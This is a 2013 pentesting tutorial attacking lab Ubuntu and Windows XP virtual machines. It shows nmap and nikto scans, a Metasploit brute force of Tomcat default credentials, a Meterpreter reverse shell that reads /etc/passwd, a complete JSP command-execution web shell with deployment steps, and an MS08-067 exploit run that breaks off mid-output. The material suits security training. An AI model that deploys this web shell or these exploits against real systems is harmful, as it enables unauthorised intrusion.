Hacking

Exploitation Ubuntu - Windows Services

Fotis Liatsis
June 27, 2013 by
Fotis Liatsis

This tutorial describes the basic principles of gathering information to exploit vulnerable machines like Ubuntu Server and Windows XP. On both systems (Ubuntu and Windows) are installed some vulnerable services like Tomcat Java / Samba File Server or vulnerable Databases like PostgreSQL for Ubuntu machine and MySQL for Windows respectively.

This tutorial outlines many of the security flaws on both OS machines, such as:

Earn two pentesting certifications at once!

Earn two pentesting certifications at once!

Enroll in one boot camp to earn both your Certified Ethical Hacker (CEH) and CompTIA PenTest+ certifications — backed with an Exam Pass Guarantee.

  • Gathering information
  • Identify open network services
  • Exploit vulnerable services

(Note: For the Purpose of this tutorial BackBox (Based on Ubuntu) as OS, the latest installation package of Oracle VM Box, and Ubuntu 9.04 / Windows XP SP2 OS's will be used)

Setting Up VM – Manual ifconfig

Before starting our Penetration Testing on the VM's, we'll setup and configure a couple of things on the VM machine system. After we have created our OS machine (Both Ubuntu and Windows OS) click the "Settings" button and navigate to the "Network" tab once more. At network interface, choose the "Host-only Adapter" and automatically the vboxnet0 option will be set.

Next we'll set up the eth0 interface for Ubuntu OS. On the terminal type:

[c]

ifconfig eth0 192.168.56.102 netmask 255.255.255.0 up

[/c]

If you would like to have the network information statically assigned without having to manually enter this information each time, you can edit the /etc/network/ interfaces file for the appropriate Ethernet device.

[c]

# The host-only network interface

auto eth0

iface eth0 inet static

address 192.168.56.102

netmask 255.255.255.0

network 192.168.56.0

broadcast 192.168.56.255

[/c]

(Note: Be sure to restart the network service after modifying this file (/etc/init.d/ networking restart).)

Next you will set up the Windows Network Interface. On the command prompt type cmd and click "OK".

Then Navigate to the Network Connections Panel.

Next at the properties panel choose "Internet Protocol(TCP/IP)" and click "Properties". On the "General" tab choose the "Use the following IP address" and add the appropriate network information (see below):

Next at the command prompt write the following command to verify the adapter options:

[c]

ipconfig /all

[/c]

Verifying connectivity

We will attempt to ping the machines to verify connectivity. If everything is configured correctly, you should see something along the lines of the following commands:

Ubuntu Machine:

[c]

root@wizard32:~# ping 192.168.56.102

PING 192.168.56.102 (192.168.56.102) 56(84) bytes of data.

64 bytes from 192.168.56.102: icmp_req=1 ttl=64 time=0.302 ms

64 bytes from 192.168.56.102: icmp_req=2 ttl=64 time=0.754 ms

^C

--- 192.168.56.102 ping statistics ---

2 packets transmitted, 2 received, 0% packet loss, time 999ms

rtt min/avg/max/mdev = 0.302/0.528/0.754/0.226 ms

[/c]

And

[c]

root@ubuntu:~$ ping 192.168.56.1

PING 192.168.56.1 (192.168.56.1) 56(84) bytes of data.

64 bytes from 192.168.56.1: icmp_req=1 ttl=64 time=0.251 ms

64 bytes from 192.168.56.1: icmp_req=2 ttl=64 time=0.306 ms

^C

--- 192.168.56.1 ping statistics ---

2 packets transmitted, 2 received, 0% packet loss, time 1001ms

rtt min/avg/max/mdev = 0.251/0.278/0.306/0.032 ms

[/c]

Windows Machine:

[c]

root@wizard32:~# ping 192.168.56.103

PING 192.168.56.103 (192.168.56.103) 56(84) bytes of data.

64 bytes from 192.168.56.103: icmp_req=1 ttl=128 time=0.536 ms

64 bytes from 192.168.56.103: icmp_req=2 ttl=128 time=0.574 ms

^C

--- 192.168.56.103 ping statistics ---

2 packets transmitted, 2 received, 0% packet loss, time 1000ms

rtt min/avg/max/mdev = 0.536/0.555/0.574/0.019 ms

[/c]

And

[c]

C:Documents and Settingswindowsxp>ping 192.168.56.1

Pinging 192.168.56.1 with 32 bytes of data:

Reply from 192.168.56.1: bytes=32 time<1ms TTL=64

Reply from 192.168.56.1: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.56.1

Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

[/c]

Gathering Information - Ubuntu Machine

We'll begin by trying some basic scans against our VM (Ubuntu) machine at 192.168.56.102. Here we will perform a simple scan to determine what ports are open on our target system using the -p option.

[c]

root@wizard32:~# nmap -p- 192.168.56.102

Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 13:54 EEST

Nmap scan report for 192.168.56.102

Host is up (0.00020s latency).

Not shown: 65522 closed ports

PORT STATE SERVICE

21/tcp open ftp

22/tcp open ssh

23/tcp open telnet

25/tcp open smtp

53/tcp open domain

80/tcp open http

139/tcp open netbios-ssn

445/tcp open microsoft-ds

3306/tcp open mysql

3632/tcp open distccd

5432/tcp open postgresql

8009/tcp open ajp13

8180/tcp open unknown

MAC Address: 08:00:27:08:F3:66 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 14.39 seconds

[/c]

Looking at the highlighted results, we can determine that there are many open ports. So let's use another tool to identify a little bit more on our machine.

[c]

root@wizard32:~# nikto -h 192.168.56.102 -p 8180

- Nikto v2.1.4

---------------------------------------------------------------------------

+ Target IP: 192.168.56.102

+ Target Hostname: 192.168.56.102

+ Target Port: 8180

+ Start Time: 2013-06-19 14:04:00

---------------------------------------------------------------------------

+ Server: Apache-Coyote/1.1

+ No CGI Directories found (use '-C all' to force check all possible dirs)

+ OSVDB-39272: /favicon.ico file identifies this server as: Apache Tomcat

+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS

+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.

+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.

+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.

+ /: Appears to be a default Apache Tomcat install.

+ OSVDB-376: /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.

+ OSVDB-3092: /admin/: This might be interesting...

+ OSVDB-3233: /tomcat-docs/index.html: Default Apache Tomcat documentation found.

+ OSVDB-3233: /manager/html-manager-howto.html: Tomcat documentation found.

+ OSVDB-3233: /manager/manager-howto.html: Tomcat documentation found.

+ OSVDB-3092: /webdav/index.html: WebDAV support is enabled.

+ OSVDB-3233: /jsp-examples/: Apache Java Server Pages documentation.

+ /admin/account.html: Admin login page/section found.

+ /admin/controlpanel.html: Admin login page/section found.

+ /admin/cp.html: Admin login page/section found.

+ /admin/index.html: Admin login page/section found.

+ /admin/login.html: Admin login page/section found.

+ /servlets-examples/: Tomcat servlets examples are visible.

+ 6448 items checked: 0 error(s) and 19 item(s) reported on remote host

+ End Time: 2013-06-19 14:05:24 (84 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested[/c]

Exploit Vulnerable Backdoors

By reviewing the highlighted code closely we can see that the port 8180/tcp runs an Apache Tomcat Server. We can identify the Version of Apache Tomcat Server once more using Metasploit.

[c]

msf > use auxiliary/admin/http/tomcat_administration

msf auxiliary(tomcat_administration) > show options

Module options (auxiliary/admin/http/tomcat_administration):

Name Current Setting Required Description

---- --------------- -------- -----------

Proxies no Use a proxy chain

RHOSTS yes The target address range or CIDR identifier

RPORT 8180 yes The target port

THREADS 1 yes The number of concurrent threads

TOMCAT_PASS no The password for the specified username

TOMCAT_USER no The username to authenticate as

VHOST no HTTP server virtual host

msf auxiliary(tomcat_administration) > set RHOSTS 192.168.56.102

RHOSTS => 192.168.56.102

msf auxiliary(tomcat_administration) > run

[*] http://192.168.56.102:8180/admin [Apache-Coyote/1.1] [Apache Tomcat/5.5] [Tomcat Server Administration] [tomcat/tomcat]

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

[/c]

As we can see, Apache Tomcat/5.5 is used. So once more using Metasploit we'll try to connect to the Apache Tomcat Server according to some default user/pass options:

[c]

msf > use auxiliary/scanner/http/tomcat_mgr_login

msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.56.102

RHOSTS => 192.168.56.102

msf auxiliary(tomcat_mgr_login) > set RPORT 8180

RPORT => 8180

msf auxiliary(tomcat_mgr_login) > run

[*] 192.168.56.102:8180 TOMCAT_MGR - [01/63] - Trying username:'' with password:''

[-] 192.168.56.102:8180 TOMCAT_MGR - [01/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''

[*] 192.168.56.102:8180 TOMCAT_MGR - [02/63] - Trying username:'admin' with password:''

[-] 192.168.56.102:8180 TOMCAT_MGR - [02/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] 192.168.56.102:8180 TOMCAT_MGR - [03/63] - Trying username:'manager' with password:''

[-] 192.168.56.102:8180 TOMCAT_MGR - [03/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] 192.168.56.102:8180 TOMCAT_MGR - [04/63] - Trying username:'role1' with password:''

[-] 192.168.56.102:8180 TOMCAT_MGR - [04/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] 192.168.56.102:8180 TOMCAT_MGR - [05/63] - Trying username:'root' with password:''

[-] 192.168.56.102:8180 TOMCAT_MGR - [05/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] 192.168.56.102:8180 TOMCAT_MGR - [06/63] - Trying username:'tomcat' with password:''

[-] 192.168.56.102:8180 TOMCAT_MGR - [06/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'

[*] 192.168.56.102:8180 TOMCAT_MGR - [07/63] - Trying username:'both' with password:''

[-] 192.168.56.102:8180 TOMCAT_MGR - [07/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] 192.168.56.102:8180 TOMCAT_MGR - [08/63] - Trying username:'j2deployer' with password:''

[-] 192.168.56.102:8180 TOMCAT_MGR - [08/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'

[*] 192.168.56.102:8180 TOMCAT_MGR - [09/63] - Trying username:'ovwebusr' with password:''

[-] 192.168.56.102:8180 TOMCAT_MGR - [09/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'

[*] 192.168.56.102:8180 TOMCAT_MGR - [10/63] - Trying username:'cxsdk' with password:''

[-] 192.168.56.102:8180 TOMCAT_MGR - [10/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'

[*] 192.168.56.102:8180 TOMCAT_MGR - [11/63] - Trying username:'ADMIN' with password:''

[-] 192.168.56.102:8180 TOMCAT_MGR - [11/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'

[*] 192.168.56.102:8180 TOMCAT_MGR - [12/63] - Trying username:'xampp' with password:''

[-] 192.168.56.102:8180 TOMCAT_MGR - [12/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'

[*] 192.168.56.102:8180 TOMCAT_MGR - [13/63] - Trying username:'admin' with password:'admin'

[-] 192.168.56.102:8180 TOMCAT_MGR - [13/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] 192.168.56.102:8180 TOMCAT_MGR - [14/63] - Trying username:'manager' with password:'manager'

[-] 192.168.56.102:8180 TOMCAT_MGR - [14/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] 192.168.56.102:8180 TOMCAT_MGR - [15/63] - Trying username:'role1' with password:'role1'

[-] 192.168.56.102:8180 TOMCAT_MGR - [15/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] 192.168.56.102:8180 TOMCAT_MGR - [16/63] - Trying username:'root' with password:'root'

[-] 192.168.56.102:8180 TOMCAT_MGR - [16/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] 192.168.56.102:8180 TOMCAT_MGR - [17/63] - Trying username:'tomcat' with password:'tomcat'

[+] http://192.168.56.102:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'

[*] 192.168.56.102:8180 TOMCAT_MGR - [18/63] - Trying username:'both' with password:'both'

[-] 192.168.56.102:8180 TOMCAT_MGR - [18/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] 192.168.56.102:8180 TOMCAT_MGR - [19/63] - Trying username:'j2deployer' with password:'j2deployer'

[-] 192.168.56.102:8180 TOMCAT_MGR - [19/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'

[*] 192.168.56.102:8180 TOMCAT_MGR - [20/63] - Trying username:'ovwebusr' with password:'ovwebusr'

[-] 192.168.56.102:8180 TOMCAT_MGR - [20/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'

[*] 192.168.56.102:8180 TOMCAT_MGR - [21/63] - Trying username:'cxsdk' with password:'cxsdk'

[-] 192.168.56.102:8180 TOMCAT_MGR - [21/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'

[*] 192.168.56.102:8180 TOMCAT_MGR - [22/63] - Trying username:'ADMIN' with password:'ADMIN'

[-] 192.168.56.102:8180 TOMCAT_MGR - [22/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'

[*] 192.168.56.102:8180 TOMCAT_MGR - [23/63] - Trying username:'xampp' with password:'xampp'

[-] 192.168.56.102:8180 TOMCAT_MGR - [23/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'

[*] 192.168.56.102:8180 TOMCAT_MGR - [24/63] - Trying username:'ovwebusr' with password:'OvW*busr1'

[-] 192.168.56.102:8180 TOMCAT_MGR - [24/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'

[*] 192.168.56.102:8180 TOMCAT_MGR - [25/63] - Trying username:'cxsdk' with password:'kdsxc'

[-] 192.168.56.102:8180 TOMCAT_MGR - [25/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'

[*] 192.168.56.102:8180 TOMCAT_MGR - [26/63] - Trying username:'root' with password:'owaspbwa'

[-] 192.168.56.102:8180 TOMCAT_MGR - [26/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] 192.168.56.102:8180 TOMCAT_MGR - [27/63] - Trying username:'' with password:'admin'

[-] 192.168.56.102:8180 TOMCAT_MGR - [27/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''

[*] 192.168.56.102:8180 TOMCAT_MGR - [28/63] - Trying username:'' with password:'manager'

[-] 192.168.56.102:8180 TOMCAT_MGR - [28/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''

[*] 192.168.56.102:8180 TOMCAT_MGR - [29/63] - Trying username:'' with password:'role1'

[-] 192.168.56.102:8180 TOMCAT_MGR - [29/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''

[*] 192.168.56.102:8180 TOMCAT_MGR - [30/63] - Trying username:'' with password:'root'

[-] 192.168.56.102:8180 TOMCAT_MGR - [30/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''

[*] 192.168.56.102:8180 TOMCAT_MGR - [31/63] - Trying username:'' with password:'tomcat'

[-] 192.168.56.102:8180 TOMCAT_MGR - [31/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''

[*] 192.168.56.102:8180 TOMCAT_MGR - [32/63] - Trying username:'' with password:'s3cret'

[-] 192.168.56.102:8180 TOMCAT_MGR - [32/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''

[*] 192.168.56.102:8180 TOMCAT_MGR - [33/63] - Trying username:'admin' with password:'manager'

[-] 192.168.56.102:8180 TOMCAT_MGR - [33/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] 192.168.56.102:8180 TOMCAT_MGR - [34/63] - Trying username:'admin' with password:'role1'

[-] 192.168.56.102:8180 TOMCAT_MGR - [34/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] 192.168.56.102:8180 TOMCAT_MGR - [35/63] - Trying username:'admin' with password:'root'

[-] 192.168.56.102:8180 TOMCAT_MGR - [35/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] 192.168.56.102:8180 TOMCAT_MGR - [36/63] - Trying username:'admin' with password:'tomcat'

[-] 192.168.56.102:8180 TOMCAT_MGR - [36/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] 192.168.56.102:8180 TOMCAT_MGR - [37/63] - Trying username:'admin' with password:'s3cret'

[-] 192.168.56.102:8180 TOMCAT_MGR - [37/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'

[*] 192.168.56.102:8180 TOMCAT_MGR - [38/63] - Trying username:'manager' with password:'admin'

[-] 192.168.56.102:8180 TOMCAT_MGR - [38/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] 192.168.56.102:8180 TOMCAT_MGR - [39/63] - Trying username:'manager' with password:'role1'

[-] 192.168.56.102:8180 TOMCAT_MGR - [39/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] 192.168.56.102:8180 TOMCAT_MGR - [40/63] - Trying username:'manager' with password:'root'

[-] 192.168.56.102:8180 TOMCAT_MGR - [40/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] 192.168.56.102:8180 TOMCAT_MGR - [41/63] - Trying username:'manager' with password:'tomcat'

[-] 192.168.56.102:8180 TOMCAT_MGR - [41/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] 192.168.56.102:8180 TOMCAT_MGR - [42/63] - Trying username:'manager' with password:'s3cret'

[-] 192.168.56.102:8180 TOMCAT_MGR - [42/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'

[*] 192.168.56.102:8180 TOMCAT_MGR - [43/63] - Trying username:'role1' with password:'admin'

[-] 192.168.56.102:8180 TOMCAT_MGR - [43/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] 192.168.56.102:8180 TOMCAT_MGR - [44/63] - Trying username:'role1' with password:'manager'

[-] 192.168.56.102:8180 TOMCAT_MGR - [44/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] 192.168.56.102:8180 TOMCAT_MGR - [45/63] - Trying username:'role1' with password:'root'

[-] 192.168.56.102:8180 TOMCAT_MGR - [45/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] 192.168.56.102:8180 TOMCAT_MGR - [46/63] - Trying username:'role1' with password:'tomcat'

[-] 192.168.56.102:8180 TOMCAT_MGR - [46/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] 192.168.56.102:8180 TOMCAT_MGR - [47/63] - Trying username:'role1' with password:'s3cret'

[-] 192.168.56.102:8180 TOMCAT_MGR - [47/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'

[*] 192.168.56.102:8180 TOMCAT_MGR - [48/63] - Trying username:'root' with password:'admin'

[-] 192.168.56.102:8180 TOMCAT_MGR - [48/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] 192.168.56.102:8180 TOMCAT_MGR - [49/63] - Trying username:'root' with password:'manager'

[-] 192.168.56.102:8180 TOMCAT_MGR - [49/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] 192.168.56.102:8180 TOMCAT_MGR - [50/63] - Trying username:'root' with password:'role1'

[-] 192.168.56.102:8180 TOMCAT_MGR - [50/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] 192.168.56.102:8180 TOMCAT_MGR - [51/63] - Trying username:'root' with password:'tomcat'

[-] 192.168.56.102:8180 TOMCAT_MGR - [51/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] 192.168.56.102:8180 TOMCAT_MGR - [52/63] - Trying username:'root' with password:'s3cret'

[-] 192.168.56.102:8180 TOMCAT_MGR - [52/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'

[*] 192.168.56.102:8180 TOMCAT_MGR - [53/63] - Trying username:'both' with password:'admin'

[-] 192.168.56.102:8180 TOMCAT_MGR - [53/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] 192.168.56.102:8180 TOMCAT_MGR - [54/63] - Trying username:'both' with password:'manager'

[-] 192.168.56.102:8180 TOMCAT_MGR - [54/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] 192.168.56.102:8180 TOMCAT_MGR - [55/63] - Trying username:'both' with password:'role1'

[-] 192.168.56.102:8180 TOMCAT_MGR - [55/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] 192.168.56.102:8180 TOMCAT_MGR - [56/63] - Trying username:'both' with password:'root'

[-] 192.168.56.102:8180 TOMCAT_MGR - [56/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] 192.168.56.102:8180 TOMCAT_MGR - [57/63] - Trying username:'both' with password:'tomcat'

[-] 192.168.56.102:8180 TOMCAT_MGR - [57/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] 192.168.56.102:8180 TOMCAT_MGR - [58/63] - Trying username:'both' with password:'s3cret'

[-] 192.168.56.102:8180 TOMCAT_MGR - [58/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

[/c]

Reviewing the result we can identify that Apache Tomcat Server accepts as username/password the "tomcat" string, so according to this result, let's exploit it:

[c]

msf> use exploit/multi/http/tomcat_mgr_deploy

msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

Name Current Setting Required Description

---- --------------- -------- -----------

PASSWORD no The password for the specified username

PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)

Proxies no Use a proxy chain

RHOST yes The target address

RPORT 80 yes The target port

USERNAME no The username to authenticate as

VHOST no HTTP server virtual host

Exploit target:

Id Name

-- ----

0 Automatic

msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.56.102

RHOST => 192.168.56.102

msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat

USERNAME => tomcat

msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat

PASSWORD => tomcat

msf exploit(tomcat_mgr_deploy) > set RPORT 8180

RPORT => 8180

msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.56.1:4444

[*] Attempting to automatically select a target...

[*] Automatically selected target "Linux x86"

[*] Uploading 6471 bytes as DqyPmto6a9UzwBp3l1AUIFIT.war ...

[*] Executing /DqyPmto6a9UzwBp3l1AUIFIT/xl6Pc2XuqQlqxb03Kl4LmxKMbO3p.jsp...

[*] Undeploying DqyPmto6a9UzwBp3l1AUIFIT ...

[*] Sending stage (30246 bytes) to 192.168.56.102

[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:51208) at 2013-06-18 15:30:53 +0300

meterpreter > getuid

Server username: tomcat55

meterpreter > shell

Process 1 created.

Channel 1 created.

id

uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)

cd /etc

cat passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

::

:

[/c]

Vulnerable Web Service

Open a browser and type in the field, the IP of the VM and specify the port of Apache Tomcat server (IP:Port)

Next click on "Tomcat Manager" from the Administration Panel at the left and type as username/password the "tomcat" string.

Next we'll create and upload a vulnerable .war file which will give us access to execute a vulnerable code. So create a cmd_shell.jsp file, which will contain the following code:

[js]

<%@ page import="java.util.*,java.io.*"%>

<%

%>

<HTML>

<TITLE>JSP Shell</TITLE>

<BODY>

Note: Against Windows you may need to prefix your command with cmd.exe /c

</br></br>

JSP Command:

<FORM METHOD="GET" NAME="myform" ACTION="">

<INPUT TYPE="text" NAME="cmd">

<INPUT TYPE="submit" VALUE="Execute">

</FORM>

<PRE>

<%

if (request.getParameter("cmd") != null) {

out.println("Command: " + request.getParameter("cmd") + "<BR>");

Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));

OutputStream os = p.getOutputStream();

InputStream in = p.getInputStream();

DataInputStream dis = new DataInputStream(in);

String disr = dis.readLine();

while ( disr != null ) {

out.println(disr);

disr = dis.readLine();

}

}

%>

</PRE>

</BODY>

</HTML>

[/js]

Then compress the file using the jar command as follows:

[c]

jar -cvf cmd.war cmd_shell.jsp

[/c]

(Note: .war format is the acceptable file type for deploy at Apache Tomcat Manager)

Next Browse the .war file and then deploy it. As we can see the /cmd path was added.

Click this path and then on the navigation bar to complete the path adding cmd_shell.jsp:

At this point we can type any Unix/Windows command like running a command prompt window.

Gathering Information - Windows XP Machine

We'll begin by trying some basic scan as previews against our VM (Windows XP) machine at 192.168.56.103.

[c]

root@wizard32:~# nmap -p- 192.168.56.103

Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 21:56 EEST

Nmap scan report for 192.168.56.103

Host is up (0.00070s latency).

Not shown: 65528 closed ports

PORT STATE SERVICE

25/tcp open smtp

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

443/tcp open https

445/tcp open microsoft-ds

1025/tcp open NFS-or-IIS

MAC Address: 08:00:27:4F:38:30 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 31.09 seconds

[/c]

Looking at the highlighted results, we can determine that there are many open ports. So let's focus on port 445. Using the nmap tool once more we'll add a couple of parameters to discover a little bit more of the specific port.

[c]

root@wizard32:~# nmap -A -Pn -T4 192.168.56.103 -p 445

Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 21:55 EEST

Nmap scan report for 192.168.56.103

Host is up (0.00055s latency).

PORT STATE SERVICE VERSION

445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds

MAC Address: 08:00:27:4F:38:30 (Cadmus Computer Systems)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

Device type: general purpose

Running: Microsoft Windows XP|2003

OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003

OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003

Network Distance: 1 hop

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

|_nbstat: NetBIOS name: WINDOWSX-C7B000, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:4f:38:30 (Cadmus Computer Systems)

|_smbv2-enabled: Server doesn't support SMBv2 protocol

| smb-security-mode:

| Account that was used for smb scripts: guest

| User-level authentication

| SMB Security: Challenge/response passwords supported

|_ Message signing disabled (dangerous, but default)

| smb-os-discovery:

| OS: Windows XP (Windows 2000 LAN Manager)

| Computer name: windowsx-c7b000

| NetBIOS computer name: WINDOWSX-C7B000

| Workgroup: WORKGROUP

|_ System time: 2013-06-18 04:36:59 UTC+3

TRACEROUTE

HOP RTT ADDRESS

1 0.55 ms 192.168.56.103

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 20.51 seconds

[/c]

-A: Aggressive initiates many options at once such as version and script scanning. Use with caution.

-T (0-5): Timing options Determines how aggressive you want the scan to be.

-Pn: We stop this action for sending out a pingrequest

-p: Only scan specified ports

Identify network services – Exploit Vulnerable Backdoors

By reviewing the highlighted code closely we can see that the port 445/tcp runs a SMB Server. We can identify the OS environment which the SMB server runs by typing:

[c]

msf > use auxiliary/scanner/smb/smb_version

msf auxiliary(smb_version) > set RHOSTS 192.168.56.103

RHOSTS => 192.168.56.103

msf auxiliary(smb_version) > run

[*] 192.168.56.103:445 is running Windows XP Service Pack 2 (language: English) (name:WINDOWSX-C7B000) (domain:WORKGROUP)

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

[/c]

As we can see, the SMB Server runs on the Windows XP SP2 environment. So once more using Metasploit will try to exploit it.

[c]

msf> use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set RHOST 192.168.56.103

RHOST => 192.168.56.103

set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1

LHOST => 192.168.56.1

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 192.168.56.103 yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique: seh, thread, process, none

LHOST 192.168.56.1 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic Targeting

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.56.1:4444

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP - Service Pack 2 - lang:English

